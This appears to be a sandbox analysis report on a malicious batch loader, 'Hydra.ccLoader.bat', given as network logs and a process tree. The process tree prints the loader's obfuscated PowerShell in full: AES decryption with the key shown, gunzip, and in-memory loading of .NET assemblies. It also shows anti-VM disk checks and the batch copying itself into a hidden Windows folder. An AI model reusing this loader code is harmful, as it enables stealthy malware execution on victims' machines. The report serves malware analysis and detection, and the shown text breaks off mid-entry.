                                          Dec 12, 2024 18:02:50.669286966 CET192.168.2.71.1.1.10xa937Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 12, 2024 18:01:55.840845108 CET1.1.1.1192.168.2.70x5846No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 12, 2024 18:02:50.809104919 CET1.1.1.1192.168.2.70xa937No error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
                                          • ipwho.is
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749828108.181.61.494434412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-12 17:02:53 UTC150OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                          Host: ipwho.is
                                          Connection: Keep-Alive
                                          2024-12-12 17:02:53 UTC223INHTTP/1.1 200 OK
                                          Date: Thu, 12 Dec 2024 17:02:53 GMT
                                          Content-Type: application/json; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Server: ipwhois
                                          Access-Control-Allow-Headers: *
                                          X-Robots-Tag: noindex
                                          2024-12-12 17:02:53 UTC1021INData Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f
                                          Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.189", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:12:02:00
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" "
                                          Imagebase:0x7ff6b6c60000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:1
                                          Start time:12:02:01
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:12:02:01
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic diskdrive get Model
                                          Imagebase:0x7ff6e26e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:12:02:01
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                          Imagebase:0x7ff6f5220000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:5
                                          Start time:12:02:03
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
                                          Imagebase:0x7ff6b6c60000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:12:02:03
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:12:02:12
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\dllhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}
                                          Imagebase:0x7ff7d8730000
                                          File size:21'312 bytes
                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:8
                                          Start time:12:02:12
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\winlogon.exe
                                          Wow64 process (32bit):false
                                          Commandline:winlogon.exe
                                          Imagebase:0x7ff6fc1b0000
                                          File size:906'240 bytes
                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:9
                                          Start time:12:02:13
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\lsass.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\lsass.exe
                                          Imagebase:0x7ff6d9390000
                                          File size:59'456 bytes
                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:10
                                          Start time:12:02:13
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                          Imagebase:0x7ff6b6c60000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:11
                                          Start time:12:02:13
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:12
                                          Start time:12:02:13
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:14
                                          Start time:12:02:17
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\dwm.exe
                                          Wow64 process (32bit):false
                                          Commandline:"dwm.exe"
                                          Imagebase:0x7ff74b010000
                                          File size:94'720 bytes
                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:15
                                          Start time:12:02:17
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                          Imagebase:0x7ff6b6c60000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:16
                                          Start time:12:02:17
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:17
                                          Start time:12:02:17
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic diskdrive get Model
                                          Imagebase:0x7ff6e26e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:12:02:18
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                          Imagebase:0x7ff6f5220000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:12:02:21
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:20
                                          Start time:12:02:21
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:21
                                          Start time:12:02:21
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:22
                                          Start time:12:02:22
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:23
                                          Start time:12:02:23
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:24
                                          Start time:12:02:23
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:25
                                          Start time:12:02:24
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:26
                                          Start time:12:02:24
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:27
                                          Start time:12:02:24
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:28
                                          Start time:12:02:27
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:29
                                          Start time:12:02:27
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:30
                                          Start time:12:02:27
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:31
                                          Start time:12:02:28
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:32
                                          Start time:12:02:28
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:33
                                          Start time:12:02:29
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:34
                                          Start time:12:02:29
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
                                          Imagebase:0x7ff6b6c60000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:12:02:29
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:36
                                          Start time:12:02:30
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:37
                                          Start time:12:02:31
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:38
                                          Start time:12:02:31
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:39
                                          Start time:12:02:32
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:40
                                          Start time:12:02:33
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:41
                                          Start time:12:02:34
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:42
                                          Start time:12:02:35
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:43
                                          Start time:12:02:35
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:44
                                          Start time:12:02:36
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
